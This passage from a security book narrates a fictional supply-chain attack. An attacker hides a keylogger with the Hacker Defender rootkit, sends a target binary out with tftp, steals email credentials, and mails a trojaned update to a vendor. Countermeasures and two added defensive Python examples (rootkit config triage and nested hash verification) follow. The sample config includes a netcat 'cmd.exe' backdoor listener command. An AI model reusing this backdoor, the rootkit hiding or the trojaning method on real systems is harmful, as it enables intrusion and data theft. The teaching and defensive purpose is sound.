C:\~\Administrator\Desktop\New Folder\hxdef>
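Recovering a Hacker Defender configuration like the one above is the first thing a responder wants to do once a host is suspected of carrying the kit. The following is an added example, not code from the book or from the rootkit: it strips the padding characters, parses the sections, and pulls out the hidden-name patterns, the startup entries (including the netcat listener port) and the settings; the padding rules it applies are an assumption modelled on the kit’s own sample ini, and SAMPLE_INI is constructed.

```python
r"""Recover and triage a Hacker Defender (hxdef100) ini file.

Added example for this chapter, not code from the book or the rootkit.
hxdef ignores the padding characters | < > : \ / " in its ini, which is why
Phoenix's configuration looks garbled. Assumption, modelled on the kit's own
sample ini: padding is stripped from section names, list entries and
[Settings] keys; [Startup Run], [Hidden Ports] and [Free Space] entries and
[Settings] values are kept verbatim; '?' splits a startup program from args.
"""
import fnmatch
import re
from typing import Dict, List, Tuple

IGNORED = set('|<>:\\/"')
VERBATIM = {"Startup Run", "Hidden Ports", "Free Space"}

# Constructed sample patterned after the chapter's hxdef100.ini.
SAMPLE_INI = r'''
[H<<<idden T>>a/"ble]
>h"xdef"*
[<Hi<>dden" P/r>oc"/e<ss>es\]
>h"xdef"*
    /
:[St/artup Run/]
c:\temp\hxdefserver.exe
c:\temp\nc.exe?-L -p 100 -t -e cmd.exe
[Set/tin/:gs] /
P:assword=hxdef-phoenix
Ba:ckd:"oor"Shell=hxdef$$.exe
Serv:iceName=HackerDefender100
D:riv>erFileNam/e=hxdefdrv.sys
'''

def strip_padding(text: str) -> str:
    """Drop the characters hxdef ignores."""
    return "".join(ch for ch in text if ch not in IGNORED)

def parse_hxdef_ini(raw: str) -> Dict[str, List[str]]:
    """Return {section: [entries]}, de-padded where hxdef would de-pad."""
    sections: Dict[str, List[str]] = {}
    current = None
    for line in raw.splitlines():
        clean = strip_padding(line).strip()
        if not clean:  # blank or padding-only line
            continue
        if clean.startswith("[") and clean.endswith("]"):
            current = clean[1:-1].strip()
            sections.setdefault(current, [])
        elif current in VERBATIM:
            sections[current].append(line.strip())
        elif current == "Settings":
            key, _, value = line.partition("=")
            sections[current].append(strip_padding(key).strip() + "=" + value.strip())
        elif current is not None:
            sections[current].append(clean)
    return sections

def triage(sections: Dict[str, List[str]]) -> Dict[str, object]:
    """Pull out what an incident responder needs from a recovered config."""
    hidden = sections.get("Hidden Table", []) + sections.get("Hidden Processes", [])
    startup: List[Tuple[str, str]] = []
    for entry in sections.get("Startup Run", []):
        program, _, args = entry.partition("?")
        startup.append((program, args))
    # Ports the Startup Run entries bind (the nc -L -p <port> backdoor in the chapter)
    listeners = sorted(int(p) for _, a in startup for p in re.findall(r"-p\s+(\d+)", a))
    settings = dict(item.split("=", 1) for item in sections.get("Settings", []))
    return {"hidden_prefixes": sorted(set(hidden)), "startup": startup,
            "listener_ports": listeners, "settings": settings}

def is_hidden_name(name: str, prefixes: List[str]) -> bool:
    """Would the rootkit hide this file or process name? Windows names are case-insensitive."""
    return any(fnmatch.fnmatchcase(name.lower(), p.lower()) for p in prefixes)
```

Run against a recovered ini, the hidden-name patterns tell you which file and process names a clean boot (or an offline scan of the disk) should be compared against, and the listener port tells you what to look for in firewall and netflow records.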

Not only has Phoenix instantly hidden his keylogger and other files; he has also changed the environment so that anything created on the system whose name begins with hxdef, whether an executable or any other file, will automatically be hidden from Windows (and most antivirus programs) as well. With everything set, Phoenix begins to search the Windows box he’s compromised for anything named quizzi.exe. It doesn’t take him long: the executable is stored in a folder named Binaries inside a directory named Quizzi. Phoenix TFTPs the file back to his exploit box:

C:\quizzi\binaries>tftp -i 192.168.1.40 PUT quizzi.exe
tftp -i 192.168.1.40 PUT quizzi.exe
Transfer successful: 70656 bytes in 1 second.

As he’s done so many times, Phoenix quickly wraps the keylogger inside the quizzi.exe file, as shown in Figure 5.33. He configures the hxdefserver.exe file to run hidden in his wrapping options.

Figure 5.33 Phoenix wraps his keylogger inside the Quizzi program file.


The next pop-up asks Phoenix what he wants to name the combined file. He types in Quizzi.exe. The file is complete. Phoenix checks the FTP server where the keylogger (one copy of which he’s already got running on the Quizzi guy’s computer) uploads its logs and sees that it has already started to populate. He opens the first text file, and just as expected, one of the first things he sees is the user typing mail.quizzisoftware.com. Now, for the first time, Phoenix knows the name of the Quizzi guy; he reads the keylog entries that immediately follow the browser trip to the Quizzi Webmail: “[email protected].”

Next Phoenix sees what could be the most important piece of all he’s captured—he sees what is most likely the e-mail password, “peewee$go!” Phoenix can hardly contain himself because he’s close. He stands up to stretch his arms and catches movement to his left, out the window. He looks, and there is someone coming out of the building where the Quizzi guy lives. Phoenix has a good idea that this is the guy whose computer he has just hacked. His suspicion is confirmed when another person jogging by on the street calls out to the 30-something gentleman: “Hello, Jake!” Phoenix knows that’s got to be him. Without wasting more time, he quickly goes to his browser and types in the URL of the mail server he just read in his keylogger logs, mail.quizzisoftware.com. There he enters the credentials as he reads them from his keylogger dump: for username he enters [email protected], and for a password he enters peewee$go!. Phoenix is immediately presented with the typical Outlook Web Access interface, which shows him Jake’s e-mail folders. Phoenix quickly sorts the inbox by sender and sees several e-mails from his buddy [email protected]. The last one he reads is Bill (the Visual IQ guy) telling Jake (the Quizzi guy) that his client (probably Grethrip Harmon) is complaining that the quizzi.exe process breaks some of their Web apps. Bill says that his client sends the install from Visual IQ to more than 20 people inside the company because they all use it for visualization of some classified project and build reports based on the data.

Phoenix reads through a few more e-mails, and finds that just last week, Jake sent an apparently updated version of quizzi.exe that would fix the Web app problem. With this new knowledge, Phoenix promptly clicks on Compose and enters the following in the To: field: [email protected]. His message is short and sweet: “Bill, here is an updated version of quizzi.exe. After looking through it, I found some other errors in the code that will break other Web apps as well, so I just went ahead and fixed them before your clients begin to complain again. Please push this update out immediately.” Phoenix attaches his keylogger-trojaned version of quizzi.exe to the e-mail in a ZIP file, and clicks Send. Outlook Web Access confirms the message was sent. Phoenix hopes that Bill over at Visual IQ simply extracts the file, merges it with his own product, and promptly tells Grethrip to download it.

Game Over—The End Result

Shortly after Phoenix sends the e-mail to Bill Hynes at Visual IQ, he packs up his laptop and heads home, to his real home. He logs on to the Visual IQ FTP server, which he compromised earlier, and waits to see when Visual IQ modifies the executable it sends to Grethrip. It’s not long before the created time of the file Phoenix is watching changes, which lets him know that Visual IQ has most likely embedded his keylogger into the program and instructed Grethrip to go download it.

An hour after Phoenix notices the creation date of the file change on the Visual IQ FTP site, his phone rings, and it’s the same mysterious person he’s talked to only twice throughout the job.

“You’ve done well. The person inside let us know that your keylogger got through. He’s already beginning to get lots of dumps to the FTP site, and he has access to several secure areas inside Grethrip that a new hire wouldn’t have access to. He’s also been able to get access to personal and work e-mail, bank accounts, and a lot of other classified information inside Grethrip as well. As promised you’ll have all of your money tomorrow. Leave the laptop you used in your apartment, and it’ll be picked up while you’re at work Monday. Now listen closely: Forget the address of the FTP site you configured for the keylogger. Don’t ever mention it or attempt to log on to it again. If you do you’ll be a dead man.” Click. The person hangs up in typical fashion without giving Phoenix a chance to ask any questions.

A year later, the headlines of every major newspaper center on a terrorist attack against the water supply in New York. Terrorists used some chemical or biological agent to contaminate the water. What’s worse, the terrorists have released documents showing that the agent was actually created by a DoD contractor, Grethrip Harmon, for the U.S. government.

Other Possibilities

A company as big as Grethrip Harmon undoubtedly has many companies it partners with. Phoenix could have taken the same route with other companies that are subcontractors of Grethrip. Also, with the very real Hacker Defender rootkit, there could have been much more damage done. For example, what if Phoenix had hidden the rootkit inside the quizzi.exe program? That wouldn’t have been pretty.

Chained Exploit Summary

The following are the steps Phoenix took for this chained exploit:

1.   He was able to find information about who Grethrip subcontracts some of its work out to by using simple Google queries such as link:www.grethripharmon.com.

2.   Using some of the same recon techniques plus a small bit of social engineering, he was able to figure out the extent to which Visual IQ had access to Grethrip’s internal network.

3.   He was able to discover that Visual IQ sends executables to Grethrip to run internally. He also discovered that these executables are checked using MD5 hashes, which ruled out a direct compromise of the Visual IQ program.

4.   By downloading the Visual IQ program and viewing it in the IDA Pro disassembler, Phoenix was able to identify another program running inside the Visual IQ program—Quizzi.exe.

5.   Using some of the same techniques he used to recon Grethrip and Visual IQ, Phoenix launches a similar recon expedition against Quizzi Software.

6.   After some work, he discovers that Quizzi Software is a very small company with probably two or three employees. He also discovers that the owner often works from home.

7.   Locating the owner’s home address, Phoenix leases an apartment across the street, assuming a false identity.

8.   By reaping the rewards of a kid who’s hacked the home network of the Quizzi owner to get free Wi-Fi, Phoenix is able to connect to the Quizzi wireless network at the owner’s home.

9.   After connecting, Phoenix is able to access the wireless access point configuration settings by using the default username and password.

10.   By accessing this configuration page, Phoenix can change the DNS settings in the wireless router to point to another DNS server he has set up just to redirect users using the wireless network from www.google.com to an exploit-loaded page he is hosting on a Backtrack virtual machine.

11.   After the Quizzi owner tries to browse to Google, he is redirected to the waiting Backtrack virtual machine running Metasploit and is quickly exploited.

12.   After getting access to this computer, Phoenix creates an account for himself, creates a rootkit, and then loads the rootkit along with a keylogger (which will then be hidden by said rootkit) on the hacked Quizzi computer.

13.   Using credentials he got from the keylogger planted on this computer, Phoenix accesses the person’s e-mail and sends a bogus e-mail to the client (Visual IQ), prompting them to roll out a new version of a program it sells to its clients, including the real target, Grethrip Harmon.

14.   Grethrip gets infected with the keylogger, another person inside Grethrip gets to reap the benefits of captured keystrokes on multiple computers, and the rest is history.

15.   Phoenix went two levels out from his target company to actually get inside the target.

Countermeasures

This section discusses the various countermeasures you can deploy to protect against these chained exploits.

Countermeasures for Hackers Passively Finding Information about Your Company

How important is it for the world to know who your company partners with or who it subcontracts information to? Better yet, does the world even need to know this? What partner companies do you link to on your corporate Web sites? If I follow these links to these companies, what information do they freely give up about you on their Web sites? What do your security policies say about working with partner companies? Are the companies you subcontract or partner with as serious and paranoid about security as you and your company are? How many of your security policies can you turn into requirements for other companies to do business with you? It is commonplace for attacks to originate from trusted third parties. You MUST make sure your partner companies understand your security stance and respect it—particularly concerning disclosure.

Countermeasures for Social Engineering Attack on Visual IQ

The tech, Bill Hynes at Visual IQ, was willing to give up way too much information. The term security awareness comes to mind. Bill basically gave up all the goods to Phoenix and told him information that should be reserved for paying clients only. “Oh, we get our updates to clients via FTP, and we make sure they get the right version by sending them MD5 checksums via e-mail” is way too much to disclose to someone who just calls up and asks.

Countermeasures for Recon on the Visual IQ Software

Quite simply there should be protection mechanisms built into the software to prevent it from being so easily viewed. In other words, one should see obscured code, instead of “plain-as-day code” that can easily be deciphered. There are so many solutions available for this, and they are not very expensive at all these days. And there are even some open source free versions as well. One word: encryption.

Countermeasures for Wi-Fi Attack on Quizzi Home Network

It seems like all papers and books written on wireless security these days start with one piece of advice: Don’t use WEP. Although this advice has almost become cliché, WEP is still heavily in use. Several reasons contribute to this, including hardware and software that support only WEP (for example, Windows XP without Service Pack 2 or the WPA hotfix applied). The truth of the matter is that even when using WPA, a passphrase of fewer than 14 characters makes cracking WPA almost as trivial as cracking WEP. But it should be understood that the process of cracking WPA is not as well documented as cracking WEP. Just do a Google search for “Cracking WEP video” and do the same for “Cracking WPA video” and notice the difference. The attack where Phoenix simply used the default vendor username and password to manage the wireless device configuration is more commonplace than the reader might imagine. I’ve been involved in several penetration tests where many devices, including firewalls, routers, and other critical network equipment, were configured with default credentials or credentials very close to the default. The bottom line is, don’t leave any equipment set to the default. Imagine if every key for every Ford Explorer on the planet were the same—anybody with a Ford Explorer key could open the doors and drive off in anybody else’s Ford Explorer. It is my belief that every wireless access point should come with a unique default admin username and password.

Countermeasures for the Keylogger Attack

The key here is keeping antivirus software up to date and, if possible, running some type of host-based intrusion detection. The bigger problem is the rootkit Phoenix installed on the Quizzi laptop he infected, which was running Windows 2003 Server. Rootkits can be impossible to detect. Hacker Defender has been around for a while, but it’s important to note that it is highly customizable. There are several tools designed just to identify rootkits; RootkitRevealer is one popular choice. There are several other open source and commercial tools available that either do or claim to do the same thing. Just be careful that you don’t rootkit yourself by using an open source rootkit-discovering tool.

Conclusion

We really can’t say enough about how connected we are as corporations and how much blind trust we have for other companies that give us money. Although these attacks might take a while to pull off for a novice, someone doing this type of thing daily can pull off the DNS/Wi-Fi/rootkit/keylogger hack in minutes. If you look at the three companies involved in Phoenix’s attack, none was a willing participant. Although neither the partner company of Grethrip (Visual IQ) nor the partner company of the partner of Grethrip (Quizzi) had negative intentions, their much more relaxed security posture created a perfect launch pad for Phoenix to bury his tool deep in the underbelly of Grethrip. As businesses continue to buy out other businesses, and as recent economic conditions and terms such as corporate bailouts continue to make the front page of the news, it’s clear that pooling of resources and outsourcing of some operations and services will continue for some years, if not forever. The author does not know of any DoD contractor that would knowingly use software from some guy who codes out of his house in a production environment, much less a clearance environment. But what about unknowingly? Visual IQ is a reputable company and even has the integrity-checking checksum process working and in full effect. But that same check is not carried over to Quizzi. Although it’s impossible to force your security culture and posture onto partner and peripheral companies, it might be worth considering adding strong security requirements language to contracts and business deals. Otherwise, you just might find your company on the front page of every national newspaper. Not because you were negligent with your security, but because someone or some company you trusted was.
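The gap just described, a checksum that covers Visual IQ’s package but never the Quizzi component inside it, can be closed only if verification walks every embedded component against its own publisher’s hash. The following is an added example and not the vendors’ own process: an outer-only check (what the chapter describes) passes on the trojaned update, while the tree check fails on quizzi.exe; file names, contents and hashes are constructed, and SHA-256 stands in for the MD5 the chapter mentions.

```python
"""Verify a vendor update and every component embedded in it.

Added example for this chapter, not Visual IQ's or Grethrip's own process.
It models the gap the conclusion describes: the outer package is checked
against the vendor's published checksum, but the Quizzi component inside it
is never checked against anything Quizzi published. File contents and names
below are constructed; SHA-256 stands in for the MD5 the chapter's vendors
used, since MD5 collisions are practical.
"""
import hashlib
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class Component:
    name: str
    data: bytes
    children: List["Component"] = field(default_factory=list)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_tree(component: Component, published: Dict[str, str]) -> List[str]:
    """Return findings for the component and everything nested in it.
    An empty list means every level matched; a component with no published
    hash is a finding, not a pass."""
    expected = published.get(component.name)
    if expected is None:
        findings = [f"{component.name}: no published hash, cannot verify"]
    elif expected != sha256_hex(component.data):
        findings = [f"{component.name}: hash mismatch"]
    else:
        findings = []
    for child in component.children:
        findings.extend(verify_tree(child, published))
    return findings


def verify_outer_only(component: Component, published: Dict[str, str]) -> List[str]:
    """The chapter's process: check the package Visual IQ ships, nothing inside it."""
    return verify_tree(Component(component.name, component.data), published)


# Constructed stand-ins for the binaries; the trojaned build carries the keylogger.
GENUINE_QUIZZI = b"QUIZZI 1.2 genuine build (constructed)"
TROJANED_QUIZZI = GENUINE_QUIZZI + b" + wrapped hxdefserver.exe (constructed)"


def build_package(quizzi: bytes) -> Component:
    """Visual IQ's installer with quizzi.exe merged in (constructed layout)."""
    outer = b"VISUALIQ setup stub (constructed)|" + quizzi
    return Component("visualiq_setup.exe", outer, [Component("quizzi.exe", quizzi)])


def demo() -> Tuple[List[str], List[str]]:
    """Outer-only vs. full-tree verification of the trojaned update."""
    package = build_package(TROJANED_QUIZZI)
    published = {
        # Visual IQ hashes the package it built, trojaned component included.
        "visualiq_setup.exe": sha256_hex(package.data),
        # Quizzi's published hash is for its genuine build.
        "quizzi.exe": sha256_hex(GENUINE_QUIZZI),
    }
    return verify_outer_only(package, published), verify_tree(package, published)
```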
